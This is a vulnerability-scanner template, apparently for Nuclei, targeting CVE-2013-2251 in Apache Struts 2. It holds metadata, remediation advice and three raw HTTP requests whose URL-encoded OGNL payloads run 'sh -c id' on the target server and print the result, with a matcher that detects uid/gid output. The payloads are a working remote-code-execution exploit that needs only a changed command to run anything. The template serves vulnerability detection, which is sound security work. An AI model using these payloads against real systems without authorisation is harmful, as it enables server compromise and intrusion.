64 lines
3.4 KiB
YAML
64 lines
3.4 KiB
YAML
id: CVE-2013-2251
|
|
|
|
info:
|
|
name: Apache Struts 2 - DefaultActionMapper Prefixes OGNL Code Execution
|
|
author: exploitation,dwisiswant0,alex
|
|
severity: critical
|
|
description: In Struts 2 before 2.3.15.1 the information following "action:", "redirect:", or "redirectAction:" is not properly sanitized and will be evaluated as an OGNL expression against the value stack. This introduces the possibility to inject server side code.
|
|
remediation: Developers should immediately upgrade to Struts 2.3.15.1 or later.
|
|
reference:
|
|
- http://struts.apache.org/release/2.3.x/docs/s2-016.html
|
|
- https://cwiki.apache.org/confluence/display/WW/S2-016
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2013-2251
|
|
- http://archiva.apache.org/security.html
|
|
- http://cxsecurity.com/issue/WLB-2014010087
|
|
classification:
|
|
cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:C/I:C/A:C
|
|
cvss-score: 9.3
|
|
cve-id: CVE-2013-2251
|
|
cwe-id: CWE-20
|
|
epss-score: 0.97432
|
|
epss-percentile: 0.99922
|
|
cpe: cpe:2.3:a:apache:struts:2.0.0:*:*:*:*:*:*:*
|
|
metadata:
|
|
max-request: 9
|
|
vendor: apache
|
|
product: struts
|
|
tags: cve,cve2013,rce,struts,apache,ognl,kev
|
|
|
|
http:
|
|
- raw:
|
|
- |
|
|
GET /index.action?{{params}}:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{'sh','-c','id'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()} HTTP/1.1
|
|
Host: {{Hostname}}
|
|
Accept: */*
|
|
- |
|
|
GET /login.action?{{params}}:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{'sh','-c','id'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()} HTTP/1.1
|
|
Host: {{Hostname}}
|
|
Accept: */*
|
|
- |
|
|
GET /index.action?{{params}}%3A%24%7B%23context%5B%22xwork.MethodAccessor.denyMethodExecution%22%5D%3Dfalse%2C%23f%3D%23%5FmemberAccess.getClass().getDeclaredField(%22allowStaticMethodAccess%22)%2C%23f.setAccessible(true)%2C%23f.set(%23%5FmemberAccess%2Ctrue)%2C%23a%3D%40java.lang.Runtime%40getRuntime().exec(%22sh%20-c%20id%22).getInputStream()%2C%23b%3Dnew%20java.io.InputStreamReader(%23a)%2C%23c%3Dnew%20java.io.BufferedReader(%23b)%2C%23d%3Dnew%20char%5B5000%5D%2C%23c.read(%23d)%2C%23genxor%3D%23context.get(%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22).getWriter()%2C%23genxor.println(%23d)%2C%23genxor.flush()%2C%23genxor.close()%7D HTTP/1.1
|
|
Host: {{Hostname}}
|
|
Accept: */*
|
|
|
|
payloads:
|
|
params:
|
|
- "redirect"
|
|
- "action"
|
|
- "redirectAction"
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: regex
|
|
part: body
|
|
regex:
|
|
- "((u|g)id|groups)=[0-9]{1,4}\\([a-z0-9]+\\)"
|
|
|
|
- type: status
|
|
status:
|
|
- 200
|
|
- 400
|
|
condition: or
|
|
|
|
# digest: 4a0a004730450220241df3bd7b50a03534e34b2b5d534ffa5b31a5a1f358192234aa4765ddf629450221008d85c2ac591ffeb918ec09951193ecdd6c0d6ba5a0a8848b3154394312b2dfdc:922c64590222798bb761d5b6d8e72950
|